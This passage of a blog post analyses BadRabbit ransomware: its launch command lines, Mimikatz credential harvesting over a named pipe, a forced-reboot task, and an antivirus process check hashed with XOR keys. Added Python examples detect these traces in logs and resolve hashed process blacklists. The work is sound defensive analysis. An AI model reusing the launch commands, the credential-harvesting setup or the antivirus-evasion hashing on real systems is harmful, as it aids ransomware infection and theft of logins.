<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Mimikatz </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">(32-bit MD5: 37945c44a897aa42a66adcab68f560e0, 64-bit MD5: 347AC3B6B791054DE3E5720A7144A977) - dropped as a .tmp file in the Windows folder and used to harvest logins and passwords, which it hands back to BadRabbit over a named pipe, just as NotPetya did. The pipe name is passed to Mimikatz as a command-line parameter:</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">C:\Windows\<RND>.tmp \\.\pipe\{GUID}</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BadRabbit will not run if a file named ‘cscc.dat’ already exists in the Windows folder, a check that can be used as a simple vaccination on machines that have not yet been infected.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To start encrypting files, the dropper loads the dropped DLL in the same way NotPetya was launched by the M.E.Doc backdoor (“C:\Windows\system32\rundll32.exe C:\Windows\perfc.dat,#1 30”):</span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><i>“C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15”</i></span></blockquote>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="104" src="https://lh6.googleusercontent.com/MUOFSOMKxTBueMiisQblmv4sLQYtepRfXizUvibm3GH0fuq6TVwwuFXQUzG9ta3DYR6WLQlOIBTJxyX9VHkyDRJKIeZ6M_G7Is010mUQRRIMG_TRyc_oWZNO2_SGDVW7IFPDEddb" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Scheduling tasks</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BadRabbit schedules a forced system reboot a few minutes later with a scheduled task that runs:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="199" src="https://lh4.googleusercontent.com/Pc6ShOgB78jARQuKP6eHmGYB6EEooid5kILp00okdDwB3tTTEi7peT2jdZo7S5Cls3LjBV44kE73Y1iLGajLSo1gbWOhoOQFB986vczpFOGdBJhlF7_qGGyZVGZPIINr69krADnh" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">C:\WINDOWS\system32\shutdown.exe /r /t 0 /f</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After the reboot, it starts the payload from a console under the ‘SYSTEM’ account as follows:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">“C:\Windows\dispci.exe” -id 3110397262 && exit </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="199" src="https://lh3.googleusercontent.com/dlc7Mz7dieXuehqIP8dda27oqlGmIaHfBS_GwbLA0ZF61bdr3MvlOG-8efdtfxAljftXjRyxfSeSJTsszDW7NRZ6MyPrDeNhYJkfD7I5qJABx4-BZRwZXZouqGNrQXZJjNPqKl20" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">C:\WINDOWS\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 3288954816 && exit</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If a task with the same name already exists, BadRabbit deletes it and then creates a new one.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="212" src="https://lh5.googleusercontent.com/e4o5dee3i4C2yrKukJt1ftXEGi2VS0D7QIWdxcH6EUXQ60CLOiaVBRVOwjdmuFMNuD13ttkhT-dAacu2Ufx6pe76cYLDgHQw_EWlmwIKlnGwjUNlEAjf4GmCR-4MBt7SyeI63SE_" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
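<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">The launch chain above (rundll32 loading infpub.dat, the Mimikatz .tmp binary given a named pipe, the forced reboot, and the scheduled task that starts dispci.exe) leaves distinctive command lines in process-creation logs. The following is an added example, not code from the original post, that runs those indicators over log records; the ‘Image=... CommandLine=...’ record layout and every sample line are constructed for the example (the command lines inside them are the ones quoted in this analysis, with a made-up .tmp name and pipe GUID). It also includes the cscc.dat presence check that the dropper performs, so the same function can be used to confirm a vaccinated host.</div>

```python
"""Flag BadRabbit execution artefacts in process-creation log lines.

Added example, not code from the original post.  Record layout and log lines
are constructed; the command lines are those described in the analysis.
"""
import os
import re
import tempfile
from typing import Dict, List, Tuple

# One regex per launch artefact.  The NotPetya pattern is included because the
# post contrasts the two rundll32 command lines.
RULES: Dict[str, re.Pattern] = {
    "badrabbit_infpub_rundll32": re.compile(
        r"rundll32\.exe\s+C:\\Windows\\infpub\.dat,#1\b", re.IGNORECASE),
    "badrabbit_dispci_task": re.compile(
        r'C:\\Windows\\dispci\.exe["”]?\s+-id\s+\d+', re.IGNORECASE),
    "badrabbit_forced_reboot": re.compile(
        r"shutdown\.exe\s+/r\s+/t\s+0\s+/f", re.IGNORECASE),
    "badrabbit_mimikatz_pipe": re.compile(  # <RND>.tmp \\.\pipe\{GUID}
        r"C:\\Windows\\[^\\\s]+\.tmp\s+\\\\\.\\pipe\\\{[0-9A-Fa-f-]+\}", re.IGNORECASE),
    "notpetya_perfc_rundll32": re.compile(
        r"rundll32\.exe\s+C:\\Windows\\perfc\.dat,#1\b", re.IGNORECASE),
}


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_index, rule_name) for every rule that matches a line."""
    hits: List[Tuple[int, str]] = []
    for idx, line in enumerate(lines):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((idx, name))
    return hits


def verdict(hits: List[Tuple[int, str]]) -> str:
    """Strong indicators (the DLL or the disk-encryption manager being launched)
    decide the verdict.  A forced reboot alone is only 'suspicious': admins run
    'shutdown /r /t 0 /f' legitimately."""
    names = {name for _, name in hits}
    if names & {"badrabbit_infpub_rundll32", "badrabbit_dispci_task"}:
        return "badrabbit"
    if "notpetya_perfc_rundll32" in names:
        return "notpetya"
    return "suspicious" if names else "clean"


def is_vaccinated(windows_dir: str) -> bool:
    """The dropper refuses to run when cscc.dat already exists in the Windows folder."""
    return os.path.isfile(os.path.join(windows_dir, "cscc.dat"))


def vaccine_demo() -> Tuple[bool, bool]:
    """Exercise the check against a temporary stand-in for the Windows folder."""
    with tempfile.TemporaryDirectory() as fake_windows:
        before = is_vaccinated(fake_windows)
        open(os.path.join(fake_windows, "cscc.dat"), "wb").close()
        after = is_vaccinated(fake_windows)
    return before, after


# Constructed log (not a real capture).  The .tmp name and the GUID are made up.
SAMPLE_LOG = [
    'Image=C:\\Windows\\explorer.exe CommandLine="C:\\Windows\\explorer.exe"',
    'Image=C:\\Windows\\system32\\rundll32.exe CommandLine=C:\\Windows\\system32\\rundll32.exe C:\\Windows\\infpub.dat,#1 15',
    'Image=C:\\Windows\\A1B2.tmp CommandLine=C:\\Windows\\A1B2.tmp \\\\.\\pipe\\{4F7C8E63-3C1B-4C7A-9C9E-0B2A1D5E6F70}',
    'Image=C:\\Windows\\system32\\shutdown.exe CommandLine=C:\\WINDOWS\\system32\\shutdown.exe /r /t 0 /f',
    'Image=C:\\Windows\\system32\\cmd.exe CommandLine=C:\\WINDOWS\\system32\\cmd.exe /C Start "" "C:\\Windows\\dispci.exe" -id 3288954816 && exit',
    'Image=C:\\Windows\\system32\\notepad.exe CommandLine=notepad.exe C:\\Users\\user\\notes.txt',
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for idx, name in found:
        print(f"line {idx}: {name}")
    print("verdict:", verdict(found))
    print("vaccine check (before, after):", vaccine_demo())
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">The rules key on the fixed paths the malware uses (C:\Windows\infpub.dat, C:\Windows\dispci.exe) rather than on the numeric -id value or the pipe GUID, which differ per infection; feed the function the command-line field of whatever process-creation telemetry is available.</div>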
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Bootloader</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The manager</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> dispci.exe</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> carries the MBR and two versions of the bootloader kernel (kernel 1: 21,162 bytes; kernel 2: 16,718 bytes) as resources.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="207" src="https://lh4.googleusercontent.com/3TrEFkhmXkwv7jlnebPzqgxAWimuQIdim5Zm13_ZGlH-3BCbAvIHpD3seaoA-IDECDAk1ls3D9egsIJgRxsXSc2kDoCG5kfllL_d3IHK0ZtYKZspP9u31ZXCPtjuev2fxBHBjJQB" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On the right, the deployed kernel already contains the generated installation key #1:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="248" src="https://lh3.googleusercontent.com/AMicEqPodMg6yln2djPOVCL32lNaIhy4beIYDsfDbT0MAosU9exDJS6O6uFmIJmEfA-z2rIUYhQKPgHsnkLdFfR8UEOSSw9lnC6p0eKHVAjIKQTrkc4YnPuN8dfTqADaFa00pZih" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Analysis of infpub.dat</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Infpub.dat is a </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">DLL with exported functions. BadRabbit calls the first one (ordinal #1, as in the rundll32 command line above). The second one only calls the first, passing it the same input parameter that the BadRabbit dropper supplies.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="79" src="https://lh6.googleusercontent.com/e_6lHeHN95b-o-Z8FPnj3t7-oGtof_w5kOcn2GjB9WKU4OXU70514B0X4h7C-bxGCLL7MOoVJVOG2sKtsRgc1KN4rIOysPa0VEkcHfftq3OFIBjJFJz0TMHYy0QR89bIDtpNK_CE" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="462" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The process gets the following privileges: </span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SeShutdownPrivilege </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">- allows an attacker to shut down the local computer.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SeDebugPrivilege</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - allows an attacker to access and modify the target process memory.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SeTcbPrivileges</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - allows a process to authenticate like a user and thus gain access to the same resources as a user. </span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="535" src="https://lh5.googleusercontent.com/9GJLLExrsnh-BDDsz6uc_Fo1zkYswlioCDOBUBIG5JEBEAZkUNhTSyESkuFyYtFCHDhne7Gvm4-oXo8q9u0TD0CbI4tuj-cPpubzyepKzGIo08oajtPWbZ22v3rpjtQfh-57r1uy" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="528" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Bad Rabbit ransomware checks for the following running processes of DrWeb and MacAfee:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">dwwatcher.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">McTray.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">dwarkdaemon.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">dwservice.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">mfevtps.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">dwengine.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">mcshield.exe</span></span></li>
</ul>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh89PanAs8E5DaZUXV8S_eCtoI0crp-tyxgINVkhW5mn9ouEARNKpHhdi6vuuYhrequCYBsqNpMbhSOJOTisXX1UUDwy8qqHCXcijxwXGo2eTa2zaWFeGpiKlNKBzsNwhrv01d5GtLh5VB5/s1600/BadRabbit_process_blacklist.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="271" data-original-width="585" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh89PanAs8E5DaZUXV8S_eCtoI0crp-tyxgINVkhW5mn9ouEARNKpHhdi6vuuYhrequCYBsqNpMbhSOJOTisXX1UUDwy8qqHCXcijxwXGo2eTa2zaWFeGpiKlNKBzsNwhrv01d5GtLh5VB5/s640/BadRabbit_process_blacklist.png" width="640" /></a></div>
<div>
<br /></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To do that, it calculates the hash using XOR and decrement operations in the similar way that NotPetya did.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="470" src="https://lh3.googleusercontent.com/GBRidhae-njF_UZd2h4DrCKMCnmdz18D0tqQB-904_UVWJOV3ozJFbdEjPYK3iFze7oqLXnMznv7BTIKszfvzqlneITPEl6g2GhQv3tmkGhDE2qmCr_dtNEmSzMEOS22KeCa1u6P" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="446" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The difference is in the XOR key. The Bad Rabbit has “87654321h” while NotPetya - “12345678h”.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
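<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following Python is an added example, not code from this post or from the sample. It shows both sides of a hashed process blacklist: how the constants are produced from names, and how an analyst recovers names from constants lifted out of the disassembly by hashing a candidate list. The seeds 87654321h and 12345678h come from the text above; the per-byte step h = ((h ^ byte) - 1) mod 2^32 over the case-folded ASCII name is an assumption that only matches the description "XOR and decrement", so the loop read from the real binary should be passed in as the step function before a match is trusted. The candidate names beyond the seven listed above are constructed for the example.</span></div>

```python
"""Resolving a hashed process blacklist of the Bad Rabbit / NotPetya kind.

Added example; not code from the post or from the malware.  The post only says
the hash is built from XOR and decrement operations with the key 87654321h
(NotPetya: 12345678h).  The per-byte step used by default, h = ((h ^ byte) - 1)
mod 2^32 over the case-folded ASCII name, is an ASSUMPTION that matches that
description; the candidate name list is constructed for illustration.
"""
from collections import defaultdict
from typing import Callable, Dict, Iterable, List, Set

BADRABBIT_SEED = 0x87654321
NOTPETYA_SEED = 0x12345678
MASK32 = 0xFFFFFFFF

# Process names the post says Bad Rabbit looks for (Dr.Web and McAfee).
BLACKLISTED_NAMES = [
    "dwwatcher.exe", "McTray.exe", "dwarkdaemon.exe", "dwservice.exe",
    "mfevtps.exe", "dwengine.exe", "mcshield.exe",
]


def xor_dec_step(h: int, b: int) -> int:
    """Assumed per-byte step: XOR the byte into the state, then decrement."""
    return ((h ^ b) - 1) & MASK32


def process_name_hash(name: str, seed: int = BADRABBIT_SEED,
                      step: Callable[[int, int], int] = xor_dec_step) -> int:
    """Rolling 32-bit hash over the case-folded ASCII name.  Replace `step`
    with the loop read from the disassembly; case folding is an assumption
    (process-name checks on Windows are normally case-insensitive)."""
    h = seed
    for b in name.lower().encode("ascii", errors="replace"):
        h = step(h, b)
    return h


def blacklist_constants(names: Iterable[str], seed: int = BADRABBIT_SEED) -> Set[int]:
    """The constants an author embeds instead of the plain strings."""
    return {process_name_hash(n, seed) for n in names}


def resolve_hashes(unknown: Iterable[int], candidates: Iterable[str],
                   seed: int = BADRABBIT_SEED) -> Dict[int, List[str]]:
    """Analyst side: hash every candidate and keep those that hit a lifted
    constant.  A list per constant keeps accidental collisions visible."""
    table: Dict[int, List[str]] = defaultdict(list)
    for c in candidates:
        table[process_name_hash(c, seed)].append(c.lower())
    return {h: table[h] for h in unknown if h in table}


def matching_processes(running: Iterable[str], constants: Set[int],
                       seed: int = BADRABBIT_SEED) -> Set[str]:
    """Malware side: hash each live process name and test membership."""
    return {p for p in running if process_name_hash(p, seed) in constants}


# Constructed candidate list: the seven names above plus a few other
# security-product process names an analyst would try first.
CANDIDATES = [n.lower() for n in BLACKLISTED_NAMES] + [
    "avp.exe", "ns.exe", "ccsvchst.exe", "msmpeng.exe", "ekrn.exe",
]

if __name__ == "__main__":
    consts = blacklist_constants(BLACKLISTED_NAMES)
    for h, names in sorted(resolve_hashes(consts, CANDIDATES).items()):
        print(f"{h:08x} -> {', '.join(names)}")
    # Same name, different seed: NotPetya-era constants do not carry over.
    print(f"avp.exe: {process_name_hash('avp.exe', NOTPETYA_SEED):08x} (NotPetya) "
          f"vs {process_name_hash('avp.exe'):08x} (Bad Rabbit)")
    print(matching_processes(["explorer.exe", "McShield.exe"], consts))
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">With the assumed step, the state above the low seven bits changes only through borrows, so collisions between short names are plausible; that is why resolve_hashes returns every candidate that maps to a constant rather than the first one. Because each step is a bijection on the state for a fixed byte, the same name always hashes differently under the two seeds, which is why constant-based detections written for NotPetya's check do not fire on Bad Rabbit.</span></div>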
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Once the BadRabbit detects McAffee or DrWeb processes, it drops </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">cscc.dat</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in %ALLUSERSPROFILE% folder and does not encrypt files. Otherwise, cscc.dat is dropped to the Windows folder.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="243" src="https://lh4.googleusercontent.com/PXJHNWoenj2MgQUgx7x3iwLpX49BZ_0CZbQp-aT9gS6smHRy-Dh2s7zdsWmqpI9JC6m_B3EY9xCV9q2Jzta3KoismfrYGYfWeedoVJEYl9F0qdLrwd0WRIBg8Ldxmz4XZsmqYmOj" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="566" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Proliferation</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BadRabbit (infpub.dat) tries to propagate itself in a local network using the following methods:</span></div>
